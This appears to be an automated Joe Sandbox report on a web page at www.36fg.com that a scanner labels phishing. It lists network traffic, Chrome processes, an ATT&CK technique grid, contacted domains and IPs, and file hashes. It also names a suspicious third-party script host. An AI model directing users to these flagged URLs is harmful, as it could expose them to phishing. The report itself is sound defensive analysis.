Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 216.58.206.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 156.224.2.38:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6892_644140898Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6892_644140898Jump to behavior
Source: classification engineClassification label: mal52.win@23/95@10/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3220 /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.36fg.com/tp-Related/18104.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3220 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1638988 URL: https://www.36fg.com/tp-Rel... Startdate: 15/03/2025 Architecture: WINDOWS Score: 52 26 Antivirus / Scanner detection for submitted sample 2->26 28 AI detected suspicious Javascript 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 16 192.168.2.5, 138, 443, 49684 unknown unknown 6->16 18 192.168.2.6 unknown unknown 6->18 11 chrome.exe 6->11         started        14 chrome.exe 6->14         started        process5 dnsIp6 20 www.36fg.com 104.21.64.1, 443, 49733, 49734 CLOUDFLARENETUS United States 11->20 22 oudngmslhifnsf.gdmgcyy.com 156.224.2.38, 443, 49764 SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK Seychelles 11->22 24 2 other IPs or domains 11->24

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.36fg.com/tp-Related/18104.html100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.36fg.com/dgij3ogsjf2ffwg.js0%Avira URL Cloudsafe
https://www.36fg.com/static/js/counterup.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/css/scrolltop.css0%Avira URL Cloudsafe
https://www.36fg.com/images/defaultpic.gif0%Avira URL Cloudsafe
https://www.36fg.com/favicon.ico0%Avira URL Cloudsafe
https://www.36fg.com/static/images/breadcrumb.png0%Avira URL Cloudsafe
https://www.36fg.com/static/css/meanmenu.css0%Avira URL Cloudsafe
https://www.36fg.com/static/css/owl.theme.default.min.css0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlej6z1xlfq.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/css/magnific-popup.css0%Avira URL Cloudsafe
https://www.36fg.com/static/picture/blog-author.png0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlgt9z1xlfq.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/bootstrap.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/4ics6kvjbnbylgokfw72.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/magnific-popup.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/css/style.css0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/4icv6kvjbnbylgocjc3jsgyn.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/plugins.js0%Avira URL Cloudsafe
https://www.36fg.com/static/js/modernizr-3.5.0.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/js/wow.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/4icv6kvjbnbylgocxcvjsgyn.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/popper.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlcz7z1xlfq.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/meanmenu.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/pxieyp8kv8jhgfvrjjfecg.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/css/assets/img/footer/footer-bg.jpg0%Avira URL Cloudsafe
https://www.36fg.com/static/js/waypoints.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/js/jquery-1.12.4.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/picture/logo-2.png0%Avira URL Cloudsafe
https://www.36fg.com/static/css/responsive.css0%Avira URL Cloudsafe
https://www.36fg.com/static/css/fontawesome-all.min.css0%Avira URL Cloudsafe
https://www.36fg.com/static/picture/logo-1.png0%Avira URL Cloudsafe
https://www.36fg.com/static/js/ajax-form.js0%Avira URL Cloudsafe
https://www.36fg.com/static/css/owl.carousel.min.css0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/fontawesome-webfont.woff20%Avira URL Cloudsafe
https://www.36fg.com/static/js/scrolltop.js0%Avira URL Cloudsafe
https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css0%Avira URL Cloudsafe
https://www.36fg.com/static/js/owl.carousel.min.js0%Avira URL Cloudsafe
https://www.36fg.com/static/css/bootstrap.min.css0%Avira URL Cloudsafe
https://www.36fg.com/static/js/main.js0%Avira URL Cloudsafe
https://www.36fg.com/static/fonts/top-arrow.svg0%Avira URL Cloudsafe
https://www.36fg.com/static/css/animate.min.css0%Avira URL Cloudsafe
https://www.36fg.com/static/css/default.css0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
www.36fg.com
104.21.64.1
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      oudngmslhifnsf.gdmgcyy.com
      156.224.2.38
      truefalse
        high
        www.google.com
        216.58.206.68
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://www.36fg.com/images/defaultpic.giffalse
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/static/css/meanmenu.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlej6z1xlfq.woff2false
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/dgij3ogsjf2ffwg.jstrue
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/static/images/breadcrumb.pngfalse
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/static/css/scrolltop.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/favicon.icofalse
          • Avira URL Cloud: safe
          unknown
          https://www.36fg.com/static/css/owl.theme.default.min.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://oudngmslhifnsf.gdmgcyy.com/tj.jsfalse
            high
            https://www.36fg.com/static/css/magnific-popup.cssfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/js/counterup.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/js/plugins.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/js/wow.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/picture/blog-author.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/fonts/4icv6kvjbnbylgocjc3jsgyn.woff2false
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlgt9z1xlfq.woff2false
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/js/bootstrap.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://www.36fg.com/static/fonts/4ics6kvjbnbylgokfw72.woff2false
            • Avira URL Cloud: safe
            unknown
            https://a.nel.cloudflare.com/report/v4?s=X%2BbRbpd7JxMWsntsFcS1LepKvvWpTsZjxDUJ18nxEiwYfGqTQR0RVxV0a9b5fKBA5sLo%2BUCv0HwiJuridq6o6k2g7rYXlXISKHSiDgUhAB0xe2VbLySW2d3Gx6PTmmQ%3Dfalse
              high
              https://www.36fg.com/static/css/style.cssfalse
              • Avira URL Cloud: safe
              unknown
              https://www.36fg.com/tp-Related/18104.htmltrue
                unknown
                https://www.36fg.com/static/js/magnific-popup.min.jsfalse
                • Avira URL Cloud: safe
                unknown
                https://www.36fg.com/static/js/modernizr-3.5.0.min.jsfalse
                • Avira URL Cloud: safe
                unknown
                https://www.36fg.com/tp-Related/18104.html#true
                  unknown
                  https://www.36fg.com/static/fonts/4icv6kvjbnbylgocxcvjsgyn.woff2false
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/popper.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/fonts/pxibyp8kv8jhgfvrlcz7z1xlfq.woff2false
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/assets/img/footer/footer-bg.jpgfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/fonts/pxieyp8kv8jhgfvrjjfecg.woff2false
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/waypoints.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/jquery-1.12.4.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/meanmenu.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/picture/logo-2.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/responsive.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/fontawesome-all.min.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/picture/logo-1.pngfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/owl.carousel.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/owl.carousel.min.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/fonts/fontawesome-webfont.woff2false
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/ajax-form.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/scrolltop.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/js/main.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/bootstrap.min.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/fonts/top-arrow.svgfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/animate.min.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.36fg.com/static/css/default.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://fontawesome.iochromecache_156.4.drfalse
                    high
                    http://www.meanthemes.com/plugins/meanmenu/)chromecache_126.4.drfalse
                      high
                      https://modernizr.com/download/?-cssanimations-csscolumns-customelements-flexbox-history-picture-poichromecache_148.4.drfalse
                        high
                        https://github.com/bartholomej/material-scrolltop/issueschromecache_162.4.drfalse
                          high
                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_161.4.drfalse
                            high
                            http://daneden.me/animatechromecache_158.4.drfalse
                              high
                              https://github.com/bartholomej/material-scrollTop/issueschromecache_163.4.drfalse
                                high
                                https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txtchromecache_154.4.drfalse
                                  high
                                  http://opensource.org/licenses/MIT).chromecache_119.4.drfalse
                                    high
                                    https://github.com/nickpettit/glidechromecache_158.4.drfalse
                                      high
                                      https://github.com/bartholomej/material-scrollTopchromecache_163.4.drfalse
                                        high
                                        http://dimsemenov.com/plugins/magnific-popup/chromecache_150.4.drfalse
                                          high
                                          http://opensource.org/licenses/MITchromecache_158.4.drfalse
                                            high
                                            https://getbootstrap.com/)chromecache_161.4.dr, chromecache_122.4.drfalse
                                              high
                                              http://fontawesome.io/licensechromecache_156.4.drfalse
                                                high
                                                https://github.com/bartholomej/material-scrolltopchromecache_162.4.drfalse
                                                  high
                                                  http://gambit.phchromecache_159.4.drfalse
                                                    high
                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_161.4.dr, chromecache_122.4.drfalse
                                                      high
                                                      https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSEchromecache_139.4.dr, chromecache_145.4.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        156.224.2.38
                                                        oudngmslhifnsf.gdmgcyy.comSeychelles
                                                        133199SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHKfalse
                                                        104.21.64.1
                                                        www.36fg.comUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        216.58.206.68
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        IP
                                                        192.168.2.6
                                                        192.168.2.5
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1638988
                                                        Start date and time:2025-03-15 01:16:47 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://www.36fg.com/tp-Related/18104.html
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:15
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal52.win@23/95@10/6
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.199.214.10, 216.58.206.46, 172.217.16.195, 142.250.186.142, 64.233.167.84, 142.250.185.142, 172.217.18.14, 142.250.181.238, 142.250.185.234, 142.250.185.202, 142.250.186.170, 142.250.185.106, 142.250.186.138, 172.217.18.10, 172.217.18.106, 142.250.184.202, 142.250.186.42, 142.250.185.138, 172.217.16.138, 216.58.206.74, 142.250.186.106, 142.250.185.74, 142.250.185.170, 142.250.184.234, 216.58.212.138, 142.250.184.206, 172.217.16.142, 142.250.185.238, 199.232.210.172, 216.58.212.142, 216.58.206.67, 142.250.185.78, 142.250.185.195, 20.12.23.50, 20.199.58.43, 150.171.27.10, 2.23.227.208
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, translate.googleapis.com, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://www.36fg.com/tp-Related/18104.html
                                                        TimeTypeDescription
                                                        01:17:28Task SchedulerRun new task: {3C71C80C-CFDE-46CF-AF64-A52B3FEB99D1} path: .
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 512 x 330, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):6408
                                                        Entropy (8bit):7.548152833379577
                                                        Encrypted:false
                                                        SSDEEP:192:kvDGuYUHXKP1EfVyS2U/XOyAaC9EOahAHjlZB:QDrno+VyS2UvO/lEDhyF
                                                        MD5:A22087B8272E7E8C1EF5702BA943AD93
                                                        SHA1:02865BFB0C215E061F515A77882657A9ACEEE9E1
                                                        SHA-256:F4E3729058237486921233BA5EB99C641A4BFF858279FB7D36B48AB42AB9989A
                                                        SHA-512:52957B77AB19638310AE7C17CA7A183E00C6128DC14CC908FAEA542BF4DA0067D751A16F386FBB7CF24C5A6515B5F387AE8E1A7CF2201E0051A3A22559B25315
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/images/defaultpic.gif
                                                        Preview:.PNG........IHDR.......J.....kS.m....pHYs..........+......IDATx...Ol.....(.71i..pX...X`E.v-.........K!.=$.Z..@..^...K..n...[E...:.[...D..s..C..E.....1.....WC..3.y..;3........c.........7y..I.J....&O........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H........ ....$..@....H........ A...$H.........3U7 5k.X[.X]..%L...._F.....E.aXK../-D,.-~.........u..Q......c.....N..A.............?.....O."vjy.|V.....B.k/..~m%...8z...|.Q|?...{.y...!a.6.......7y..g7.D|p+S....Z..n.?{Z.........G..jDo....<....8..0F..X.Vu+.W.F.....G.Q.1j...k.._u.....G....'.....$}.+....B.....qe~..q.f...`,V.#..O...Ab.......H.....Z/.P..".........?.?._ L..........B.:.q..w#.~..&H..0bk+.?}G.j.......|RuK...9.....;v..?..G...U......w..'..^.|.X..zo.4.....kK..0bk+z.L.....-g....C..?.."n_.L..).`...T..8.....4C..?.. .]+F.... ....D.Qj!@...+..L......q.R...\..X]...M...Z.....%.@B....m.V..ZZ....bU?.s.R...e..Q...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):9850
                                                        Entropy (8bit):5.376289691245455
                                                        Encrypted:false
                                                        SSDEEP:192:cO1O8eOjum2WpnVTX8sdTTzYD8OzZBCsBmDspn25z4ctlh8feVG:ce8XqM0W
                                                        MD5:C44D2FB89C69283EFB69DDF7D991B294
                                                        SHA1:C2A1A691AEB71B9D9055E852E9103F697085D923
                                                        SHA-256:298ABE95B69FA006F71219774D771D3C361B3C56648B006111ABD8DA3B4214E0
                                                        SHA-512:F4AAE34D2F5872FD1EDCF21CADD9C8FB971B995F5F7CFCA479BDAAF33A00F7E7B28520CAFE9B782F0DEF598D878DA618D057E8CEB1ABEA215E94C30C552D2876
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/css/b6f99a7fe7b04da897d26b4ff96c2310.css
                                                        Preview:./* devanagari */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(../fonts/pxigyp8kv8jhgfvrjjlucxtakpy.woff2) format('woff2');. unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;.}./* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(../fonts/pxigyp8kv8jhgfvrjjlufntakpy.woff2) format('woff2');. unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(../fonts/pxigyp8kv8jhgfvrjjluchta.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* devanagari
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (4019), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):4019
                                                        Entropy (8bit):5.217356525483382
                                                        Encrypted:false
                                                        SSDEEP:48:RQNTy5vtMVu8EdavVlmyNAMhgL+up8zqmtwmynMETYMCCdypRa0G6W75Vroe7N+7:WaxuvgTquqdtwmjUFyi0GR5Vvoym
                                                        MD5:0444FEB93A5BB35397275148613D7C07
                                                        SHA1:FFDDB012374E39779BD5415080AB9E7AC5AFA194
                                                        SHA-256:EAF2CCC92A9F802623E6EB69AF21A03FC6BA48B509201E2DED5165B58F22957E
                                                        SHA-512:5126CB584686083AE2F01223A012EFD657FA64FE1AB2D87EE7091050B83DCFEDCB71971F9732C175B87F9AFC41E828D6BE578630728028A83A7C6DA2CDDE5A90
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/meanmenu.min.js
                                                        Preview:!function($){"use strict";$.fn.meanmenu=function(e){var n={meanMenuTarget:jQuery(this),meanMenuContainer:"body",meanMenuClose:"X",meanMenuCloseSize:"18px",meanMenuOpen:"<span /><span /><span />",meanRevealPosition:"right",meanRevealPositionDistance:"0",meanRevealColour:"",meanScreenWidth:"480",meanNavPush:"",meanShowChildren:!0,meanExpandableChildren:!0,meanExpand:"+",meanContract:"-",meanRemoveAttrs:!1,onePage:!1,meanDisplay:"block",removeElements:""};e=$.extend(n,e);var a=window.innerWidth||document.documentElement.clientWidth;return this.each(function(){var n=e.meanMenuTarget,t=e.meanMenuContainer,r=e.meanMenuClose,i=e.meanMenuCloseSize,s=e.meanMenuOpen,u=e.meanRevealPosition,m=e.meanRevealPositionDistance,l=e.meanRevealColour,o=e.meanScreenWidth,c=e.meanNavPush,v=".meanmenu-reveal",h=e.meanShowChildren,d=e.meanExpandableChildren,y=e.meanExpand,j=e.meanContract,Q=e.meanRemoveAttrs,f=e.onePage,g=e.meanDisplay,p=e.removeElements,C=!1;(navigator.userAgent.match(/iPhone/i)||navigator.us
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (20164)
                                                        Category:downloaded
                                                        Size (bytes):20336
                                                        Entropy (8bit):5.215253221901184
                                                        Encrypted:false
                                                        SSDEEP:384:fYn0vf4wzTC9nNbR1PTM4CrBEQxkxpOxvYLmD75zfC5vIfg3rzGp/TidOgHhXjEN:w0vAwzTC/nM4BxpOxv/D7pC5vfzy/Ti6
                                                        MD5:A22F3F7E61AF6A069AA6B422537C3F49
                                                        SHA1:682FDC625AE80A890D10AF2CB16E62540E2186A8
                                                        SHA-256:D2B9F29EA1F42A60A8BEB1C04F76868287F2A48D6EC50FB39D6B888584A03C49
                                                        SHA-512:71B8D409A48FBDCAAA28F8A412248163857B2CB9ED6A5C4FE2BD0C4898BA3EF7F34D0D538097D94568246BC88A317CDAA509F05095C59CAF5C567D73A973E2F6
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.36fg.com/static/js/popper.min.js
